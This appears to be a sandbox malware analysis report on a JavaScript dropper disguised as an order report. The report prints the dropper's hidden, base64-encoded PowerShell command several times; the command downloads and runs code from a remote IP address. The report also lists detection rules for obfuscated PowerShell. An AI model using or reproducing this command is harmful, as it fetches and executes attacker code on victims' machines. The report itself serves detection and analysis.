    Source: explorer.exe, 0000000C.00000000.9993448286.000000000DC16000.00000004.00000001.sdmpString found in binary or memory: http://www.%s.comSoftware
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9973977818.000000000B796000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: powershell.exe, 00000016.00000002.10493820703.000001C92F054000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9973977818.000000000B796000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9973977818.000000000B796000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
    Source: explorer.exe, 0000000C.00000000.9973977818.000000000B796000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
    Source: explorer.exe, 0000000C.00000000.9973977818.000000000B796000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
    Source: explorer.exe, 0000000C.00000000.9973977818.000000000B796000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9973977818.000000000B796000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
    Source: mirroring_hangouts.js.1.drString found in binary or memory: http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions
    Source: mirroring_hangouts.js.1.drString found in binary or memory: http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions-01
    Source: explorer.exe, 0000000C.00000000.9973977818.000000000B796000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
    Source: explorer.exe, 0000000C.00000000.9937104610.00000000052C3000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
    Source: unknown DNS traffic detected: queries for: fa000000064.resources.office.net
    Source: global traffic HTTP traffic detected: GET /click.php HTTP/1.1 Host: 185.244.41.28 Connection: Keep-Alive

    E-Banking Fraud:

    Malicious encrypted Powershell command line found
    Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=

    System Summary:

    Wscript starts Powershell (via cmd or directly)
    Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
    Source: 00000013.00000003.10199880080.000001AF430F8000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000016.00000002.10523891301.000001C9302F0000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000003.10197684686.000001AF430F8000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000003.10199731855.000001AF430F8000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000002.10205510794.000001AF433E5000.00000004.00000040.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000002.10209412160.000001AF44E70000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000016.00000002.10483734570.000001C92CFC0000.00000004.00000020.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: 00000013.00000002.10204462615.000001AF430E7000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: 00000013.00000002.10204462615.000001AF430E7000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000003.10197150129.000001AF43121000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000016.00000002.10486540996.000001C92D220000.00000004.00000040.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000002.10204790473.000001AF43145000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000003.10197244915.000001AF43145000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000002.10204512036.000001AF430F8000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000002.10204700660.000001AF43121000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000016.00000002.10487123418.000001C92EAE0000.00000004.00000040.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000016.00000003.10471709581.000001C9473AE000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000003.10199822299.000001AF430E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: 00000013.00000003.10199822299.000001AF430E6000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000003.10199638722.000001AF430D2000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: 00000013.00000003.10199638722.000001AF430D2000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000016.00000002.10534609217.000001C9473AE000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000016.00000003.10471907288.000001C9473AE000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000003.10199404893.000001AF430BB000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: 00000013.00000003.10199404893.000001AF430BB000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000003.10197553372.000001AF430B8000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: 00000013.00000003.10197553372.000001AF430B8000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: 00000013.00000003.10199569415.000001AF430F8000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
    Source: Process Memory Space: wscript.exe PID: 6608, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: Process Memory Space: powershell.exe PID: 7296, type: MEMORYSTRMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: C:\Users\user\Documents\20210816\PowerShell_transcript.841675.bhylW44j.20210816191151.txt, type: DROPPEDMatched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFA6838233722_2_00007FFA68382337
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFA6838234A22_2_00007FFA6838234A
    Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --start-maximized --enable-automation --single-argument C:\Users\user\Desktop\file.html
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5016 /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5544 /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3164 /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe 'C:\Program Files\Google\Chrome\Application\chrome.exe' --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1584,1496132701367439280,374523328326216020,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6516 /prefetch:8
    Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\Temp1_Report_03874.zip\Order_Report_12.js'
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f0ae1542-f497-484b-a175-a20db09144ba}\InProcServer32
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-611B1A95-1784.pma
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Local\Temp\aa51ab44-9e09-4433-9d9a-dfd950e743e6.tmp
    Source: classification engineClassification label: mal88.bank.evad.winHTML@48/262@13/10
    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ec23d1294499b4ffba61f212cb1217cd\mscorlib.ni.dll
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2988:304:WilStaging_02
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2988:120:WilError_02
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
    Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000C.00000000.9894395838.0000000004A10000.00000002.00000001.sdmp
    Source: Binary string: omation.pdb source: powershell.exe, 00000016.00000002.10534340939.000001C94736F000.00000004.00000001.sdmp
    Source: Binary string: wscui.pdb source: explorer.exe, 0000000C.00000000.9894395838.0000000004A10000.00000002.00000001.sdmp

    Data Obfuscation:

    PowerShell case anomaly found
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c poWERshEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADQANAAuADQAMQAuADIAOAAvAGMAbABpAGMAawAuAHAAaABwACIAKQA=
